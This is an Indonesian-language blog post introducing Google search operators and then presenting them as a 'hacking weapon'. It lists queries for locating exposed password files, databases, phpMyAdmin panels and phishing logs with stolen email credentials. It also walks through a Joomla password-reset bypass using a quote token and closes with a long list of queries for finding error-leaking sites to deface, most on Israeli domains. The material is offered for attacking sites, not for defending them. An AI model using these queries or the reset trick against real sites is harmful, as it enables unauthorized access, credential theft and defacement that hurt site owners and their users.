Sunday, May 5, 2013

Pengenalan Hacking

Pengenalan tentang google dorks :
Type-type dalam penggunaannya ada beberapa macam diantaranya:

intitle
allintitle
(Mencari judul/title pada suatu web)

inurl
allinurl
(Mencari suatu string yang terdapat pada url)

filetype

(Mencari suatu file secara lebih spesifik)
(www.google.com/help/faq_filetypes.html)

allintext
(Mencari suatu nilai string dalam suatu web)

site
(Mencari pada web tertentu)

link
(Mencari web2 yang mempunyai link pada web yang di pilih)

contoh dalam pengguunaannya:
Apabila kita ingin mencair sebuah lagu dari aveng*d maka kita ketikan sja di google seperti ini
intitle:"index of/avenged"
dan apa hasilnya, akan kelihatan semua kumpulan lagu2 tsb, dan dengan mudah untuk kita mendownloadnya.
Pengertian diatas, mksdnya biasanya dalam sebuah databse file web terdapat kata ( index of ) maka kita gunaka fungsi intitle untuk mencari sebuah title yang berkaitan dengan kata ( index of ), llu ketikan kata aveng*d agar google mencari database file tentg kata-kata aveng*d

Apabila kita ingin mencair sebuah skripsi maka kita ketikan sja di google seperti ini
intitle:"index of" "skripsi" site:.my
mksudnya site:my itu biasanya url untuk kampus berakhiran .my

dan ini contoh2 lain dalam penggunaan google dork
inurl:"guest | book" "html allowed"
inurl:password.log
intitle:"index of" password.txt site:my
intitle:"index of" admin.mdb
intitle:"index of" member.mdb
intitle:"phpmyadmin" "running on localhost"
intitle:"index of" "data base" site:il
inurl:database.inc site:il
inurl:connector.txt site:il
site:il filetype:.doc

sehingga kita bisa menggunakan google ini untk senjata hacking kita:
misalkan kita ingin mencoba untuk menembus pada web dari j**mla dengan menggunakan token (').
biasanya url ketika memasukan token tsb adlah
*******.com/index.php?option=com_user&view=reset&layout=confir m
di url tsb terdapat tulsan option=com_user
mka dgn sedikit logika, kita coba menggunakan type ( inurl ) u/ mencari url yg berkaitan dengan kata option=com_user

ketikan di google >>>>> inurl:"option=com_user"
dan akan terlihat hasilnya, kita ambil contoh pada web malaiysia saja,

http://www.site.my/index.php...ser&view=login

lalu hapus pada url (/index.php?option=com_user&view=login) dan ganti url tersebut menjadi

http://www.site.my/index.php...layout=confirm

lalu ketikan token '
dan apa hasilnya, password sudah bisa kita reset ulang,,,,

sekarang tinggal bagaimana kita meng-applikasikan kata tersebut agar bisa mencari celah pada suatu URL website.

Dork Email
filetype:txt @yahoo.com password:*
filetype:txt @ymail.com password:***
filetype:txt @yahoo.com password:***
filetype:txt @gmail.com password:*
filetype:txt @gmail.com password:*
filetype:txt email + password:* @gmail.com @yahoo.com

Dork Rapidshare
Expiration-date:*2010 +login: rapidshare.com

Note : Date nya tinggal ganti sesuka kita, mau di ubah ke 2011- 2012- 2013. Etc

Dork Fake Login

Untuk mencari email beserta Password hasil phishing bisa jga menggunakan google Dork
search z di google dengan dork ini ^-^

DORK ->
intext:"Date Submitted" intext:"password" intext:"email" inurl:"logs.txt"

Dork Untuk Defacing (The Best Dork)
Sebagian Dork untuk Aksi Deface

inurl:"id=" & intext:"Warning: preg_match() " site:.il
inurl:"id=" & intext:"Warning: ilesize() " site:.co.il
inurl:"id=" & intext:"Warning: filesize() " site:.co.il
inurl:"id=" & intext:"Warning: require() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_assoc() " site:.co.il
inurl:"id=" & intext:"Warning: mysql_fetch_array() " site:.au
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.co.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: is_writable() " site:.ca
inurl:"id=" & intext:"Warning: getimagesize() " site:.co.il
inurl:"id=" & intext:"Warning: Unknown() " site:.il
inurl:"id=" & intext:"Warning: session_start() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: pg_exec() " site:.il
inurl:"id=" & intext:"Warning: mysql_result() " site:.il
inurl:"id=" & intext:"Warning: mysql_num_rows() " site:.il
inurl:"id=" & intext:"Warning: mysql_query() " site:.il
inurl:"id=" & intext:"Warning: array_merge() " site:.co.il

Newer Post Older Post Home

0 comments:

Post a Comment